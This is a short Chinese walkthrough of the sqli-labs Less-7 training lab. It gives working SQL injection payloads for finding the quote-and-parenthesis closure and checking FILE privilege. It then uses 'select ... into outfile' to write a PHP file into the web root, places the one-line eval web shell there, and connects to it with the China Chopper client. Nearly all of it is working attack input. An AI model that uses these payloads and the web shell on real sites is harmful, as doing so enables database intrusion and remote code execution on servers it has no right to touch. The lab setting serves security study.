知识点:
select……into outfile 'file_name' 导入文件。
?id=1
?id=1"
?id=1'
?id=1')
?id=1'))
?id=1'))--+
闭合方式可能是 '))
查看用户是否有file权限。
?id=1')) and (select count(*) from mysql.user)>0--+
从 Less 7 是没办法得知路径,所以转去Less1获取文件路径。
?id=' union select 1,@@basedir,@@datadir --+
尝试写入文件
最最最重要的事情就是不要去手动创建你要写入的文件,让它自己生成,该问题曾导致我一晚上都在各种找原因。切记切记!!!
?id=1?id=1')) union select 1,2,'password' into outfile "D:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\1.php"--+
虽然报错了,但是还是生成了我需要的1.php。
<?php @eval($_POST["pass"]);?>
用一句话木马代替我们写入的信息
使用菜刀链接。